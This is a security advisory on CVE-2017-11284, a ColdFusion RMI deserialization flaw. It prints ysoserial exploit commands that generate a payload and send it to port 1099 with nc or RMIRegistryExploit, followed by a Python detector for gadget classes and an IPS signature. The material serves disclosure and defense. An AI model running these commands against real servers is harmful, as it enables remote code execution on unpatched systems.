Adobe ColdFusion RMI Registry Insecure Deserialization Vulnerability
Adobe ColdFusion is a popular application development platform. A vulnerability, CVE-2017-11284, has been reported in Adobe ColdFusion. Because objects received by the RMI Registry are not validated before deserialization, an attacker could execute arbitrary commands with root privileges. Adobe Systems ColdFusion 11 prior to update 13 and Adobe Systems ColdFusion 2016 release prior to update 5 are affected by this vulnerability.
Java supports a feature called serialization, which allows Java objects to be packed into a byte stream and deserialized by another Java application (such as an applet). The readObject() and writeObject() methods, used with the Serializable interface, perform the serialization and deserialization.
The Java Remote Method Invocation (RMI) service supports method calls across JVMs and by default listens on port 1099. When serialized data is received in a request to the RMI service of Adobe ColdFusion, an attacker could include malicious data that calls an exploitable library on the code path, triggering remote code execution.
Exploiting this vulnerability requires a payload containing a malicious serialized object. An open-source proof-of-concept tool called "ysoserial" can generate such payloads, which lowers the bar for exploitation:
$ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........
0000570: 0078 7071 007e 003a                      .xpq.~.:

$ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
$ nc 10.10.10.10 1099 < groovypayload.bin

$ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
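As an added example (not from the original advisory and not part of ysoserial), a Python heuristic of the kind an IPS or an RMI front-end check applies: it recognizes the Java serialization magic, pulls class names out of TC_CLASSDESC records and flags known gadget entry classes such as the AnnotationInvocationHandler visible at the start of the hexdump above. The denylist entries other than AnnotationInvocationHandler, and the sample byte strings, are assumptions and constructed test data.

```python
import re
import struct
STREAM_MAGIC = b"\xac\xed\x00\x05"  # the "aced 0005" at the start of the hexdump above
TC_OBJECT, TC_CLASSDESC = 0x73, 0x72  # java.io.ObjectStreamConstants ("sr" in the dump)

# Illustrative denylist of gadget-chain entry classes. The first is the class the
# CommonsCollections1 payload above begins with; the other two are assumed from
# public descriptions of the CommonsCollections and Groovy chains.
SUSPICIOUS_CLASSES = {
    "sun.reflect.annotation.AnnotationInvocationHandler",
    "org.apache.commons.collections.functors.InvokerTransformer",
    "org.codehaus.groovy.runtime.ConvertedClosure",
}
JAVA_NAME = re.compile(rb"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)+$")  # fully qualified name

def extract_class_names(data: bytes) -> list:
    """Heuristic scan (not a full ObjectInputStream parser): at each TC_CLASSDESC
    tag read the length-prefixed class name and keep it if it looks like one."""
    names, i = [], 0
    while i < len(data) - 3:
        if data[i] == TC_CLASSDESC:
            n = struct.unpack_from(">H", data, i + 1)[0]
            cand = data[i + 3:i + 3 + n]
            if 3 <= n <= 255 and len(cand) == n and JAVA_NAME.match(cand):
                names.append(cand.decode("ascii"))
                i += 3 + n  # skip the name so 'r' (0x72) bytes inside it are not re-scanned
                continue
        i += 1
    return names

def inspect_stream(data: bytes) -> dict:
    """Verdict for one captured request body: Java stream or not, declared
    classes, and which of them are denylisted."""
    serialized = data.startswith(STREAM_MAGIC)
    names = extract_class_names(data) if serialized else []
    return {"serialized": serialized, "classes": names,
            "suspicious": [n for n in names if n in SUSPICIOUS_CLASSES]}

def _class_desc(name: str) -> bytes:
    """Constructed test data: start of a TC_CLASSDESC record (tag, name, dummy UID, flags, zero fields)."""
    enc = name.encode("ascii")
    return bytes([TC_CLASSDESC]) + struct.pack(">H", len(enc)) + enc + b"\x00" * 8 + b"\x02\x00\x00"

# Constructed sample mimicking the start of the CommonsCollections1 dump above,
# and a constructed benign stream carrying a single TC_STRING ("hello").
SAMPLE_GADGET = (STREAM_MAGIC + bytes([TC_OBJECT])
                 + _class_desc("sun.reflect.annotation.AnnotationInvocationHandler")
                 + bytes([TC_OBJECT]) + _class_desc("java.util.HashMap"))
SAMPLE_BENIGN = STREAM_MAGIC + b"\x74\x00\x05hello"
```

A scan like this only shows what a network-side signature can see; the server-side fix is the vendor update, or a JVM deserialization filter (JEP 290 style) that whitelists the classes the RMI service legitimately expects.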
SonicWall has developed the following signature to identify and stop the attacks:
- IPS 13048: Adobe ColdFusion RMI Registry Insecure Deserialization